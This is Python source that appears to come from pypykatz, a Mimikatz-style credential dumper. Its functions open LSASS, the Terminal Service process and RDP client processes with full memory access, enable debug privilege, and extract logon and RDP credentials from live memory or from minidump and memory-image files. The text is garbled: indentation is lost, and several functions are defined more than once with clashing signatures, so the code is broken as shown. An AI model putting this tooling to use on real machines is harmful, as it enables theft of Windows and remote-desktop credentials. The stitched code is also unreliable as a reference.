def go_live(pid = None, all_rdp = False):
if platform.system() != 'Windows':
raise Exception('Live parsing will only work on Windows')
from pypykatz.commons.readers.local.common.live_reader_ctypes import OpenProcess, PROCESS_ALL_ACCESS
from pypykatz.commons.winapi.machine import LiveMachine
from pypykatz.commons.winapi.constants import PROCESS_VM_READ , PROCESS_VM_WRITE , PROCESS_VM_OPERATION , PROCESS_QUERY_INFORMATION , PROCESS_CREATE_THREAD
from pypykatz.commons.readers.local.common.privileges import enable_debug_privilege
from pypykatz.commons.readers.local.live_reader import LiveReader
from pypykatz.commons.readers.local.process import Process
req_access_rights = PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION | PROCESS_CREATE_THREAD
enable_debug_privilege()
targets = []
if pid is not None:
process = Process(pid=pid, access = req_access_rights )
process.list_modules()
reader = LiveReader(process_handle=process.phandle)
sysinfo = KatzSystemInfo.from_live_reader(reader)
targets.append(RDPCredParser(process, reader.get_buffered_reader(), sysinfo))
else:
machine = LiveMachine()
for service_name, display_name, pid in machine.list_services():
if service_name == 'TermService':
process = Process(pid=pid, access = req_access_rights )
reader = LiveReader(process_handle=process.phandle)
sysinfo = KatzSystemInfo.from_live_reader(reader)
targets.append(RDPCredParser(process, reader.get_buffered_reader(), sysinfo))
if all_rdp is True:
for pid in machine.list_all_pids():
try:
process = Process(pid=pid, access = req_access_rights )
for module in process.list_modules():
if module.name.lower().find("mstscax.dll") != -1:
reader = LiveReader(process_handle=process.phandle)
sysinfo = KatzSystemInfo.from_live_reader(reader)
targets.append(RDPCredParser(process, reader.get_buffered_reader(), sysinfo))
break
except Exception as e:
#import traceback
#traceback.print_exc()
print(e)
for target in targets:
target.start()
return targets
def parse_memory_dump_rekall(filename, override_timestamp=None):
from pypykatz.commons.readers.rekall.rekallreader import RekallReader
reader = RekallReader.from_memory_file(filename, override_timestamp)
sysinfo = KatzSystemInfo.from_rekallreader(reader)
mimi = pypykatz(reader, sysinfo)
mimi.start()
return mimi
def go_rekall(session, override_timestamp = None, buildnumber = None, packages = ['all']): from pypykatz.commons.readers.rekall.rekallreader import RekallReader reader = RekallReader.from_session(session, override_timestamp, buildnumber) sysinfo = KatzSystemInfo.from_rekallreader(reader) mimi = pypykatz(reader, sysinfo) mimi.start(packages) return mimi
def go_live_phandle(lsass_process_handle, packages=['all']):
if platform.system() != 'Windows':
raise Exception('Live parsing will only work on Windows')
from pypykatz.commons.readers.local.live_reader import LiveReader
reader = LiveReader(lsass_process_handle=lsass_process_handle)
sysinfo = KatzSystemInfo.from_live_reader(reader)
mimi = pypykatz(reader.get_buffered_reader(), sysinfo)
mimi.start(packages)
return mimi
def go_live():
if platform.system() != 'Windows':
raise Exception('Live parsing will only work on Windows')
from pypykatz.commons.readers.local.live_reader import LiveReader
reader = LiveReader()
sysinfo = KatzSystemInfo.from_live_reader(reader)
mimi = pypykatz(reader.get_buffered_reader(), sysinfo)
mimi.start()
return mimi
def parse_minidump_buffer(buff, packages=['all']):
"""
Parses LSASS minidump file which contents are in a bytes buffer
buff: io.BytesIO object
"""
minidump = MinidumpFile.parse_buff(buff)
reader = minidump.get_reader().get_buffered_reader()
sysinfo = KatzSystemInfo.from_minidump(minidump)
mimi = pypykatz(reader, sysinfo)
mimi.start(packages)
return mimi
def parse_minidump_bytes(data, packages=['all']):
"""
Parses LSASS minidump file bytes.
data needs to be bytearray
"""
minidump = MinidumpFile.parse_bytes(data)
reader = minidump.get_reader().get_buffered_reader()
sysinfo = KatzSystemInfo.from_minidump(minidump)
mimi = pypykatz(reader, sysinfo)
mimi.start(packages)
return mimi
async def parse_minidump_external(handle, packages = ['all'], chunksize=10*1024): """ Parses LSASS minidump file based on the file object. File object can really be any object as longs as it implements read, seek, tell functions with the same parameters as a file object would. handle: file like object """ minidump = await AMinidumpFile.parse_external(handle) reader = minidump.get_reader().get_buffered_reader(chunksize) sysinfo = KatzSystemInfo.from_minidump(minidump) mimi = apypykatz(reader, sysinfo) await mimi.start(packages) return mimi
def parse_minidump_external(handle):
"""
Parses LSASS minidump file based on the file object.
File object can really be any object as longs as
it implements read, seek, tell functions with the
same parameters as a file object would.
handle: file like object
"""
minidump = MinidumpFile.parse_external(handle)
reader = minidump.get_reader().get_buffered_reader()
sysinfo = KatzSystemInfo.from_minidump(minidump)
mimi = pypykatz(reader, sysinfo)
mimi.start()
return mimi
def parse_minidump_file(filename, rdp_module, chunksize = 10*1024):
try:
minidump = MinidumpFile.parse(filename)
reader = minidump.get_reader().get_buffered_reader(segment_chunk_size=chunksize)
sysinfo = KatzSystemInfo.from_minidump(minidump)
except Exception as e:
logger.exception('Minidump parsing error!')
raise e
try:
mimi = RDPCredParser(None, reader, sysinfo, rdp_module)
mimi.start()
except Exception as e:
logger.info('Credentials parsing error!')
raise e
return [mimi]
async def parse_minidump_file(filename, packages = ['all'], chunksize=10*1024):
try:
minidump = await AMinidumpFile.parse(filename)
reader = minidump.get_reader().get_buffered_reader(chunksize)
sysinfo = KatzSystemInfo.from_minidump(minidump)
except Exception as e:
logger.exception('Minidump parsing error!')
raise e
try:
mimi = apypykatz(reader, sysinfo)
await mimi.start(packages)
except Exception as e:
#logger.info('Credentials parsing error!')
mimi.log_basic_info()
raise e
return mimi
def parse_minidump_file(filename):
try:
minidump = MinidumpFile.parse(filename)
reader = minidump.get_reader().get_buffered_reader()
sysinfo = KatzSystemInfo.from_minidump(minidump)
except Exception as e:
logger.exception('Minidump parsing error!')
raise e
try:
mimi = pypykatz(reader, sysinfo)
mimi.start()
except Exception as e:
#logger.info('Credentials parsing error!')
mimi.log_basic_info()
raise e
return mimi
def get_sysinfo(self):
self.sysinfo = KatzSystemInfo()
#print('[+] Getting BuildNumer')
self.sysinfo.buildnumber = VmmPy_ConfigGet(
VMMDLL_OPT_WIN_VERSION_BUILD)
#print('[+] Found BuildNumber %s' % self.sysinfo.buildnumber)
#print('[+] Getting msv_dll_timestamp')
self.sysinfo.msv_dll_timestamp = int(
PEGetFileTime(self.process_pid, self.process_name))
#print('[+] Found msv_dll_timestamp %s' % self.sysinfo.msv_dll_timestamp)
#print('[+] Getting arch')
val = VmmPy_ConfigGet(VMMPY_OPT_CORE_SYSTEM)
if val == VMMPY_SYSTEM_WINDOWS_X64:
self.sysinfo.architecture = KatzSystemArchitecture.X64
else:
self.sysinfo.architecture = KatzSystemArchitecture.X86
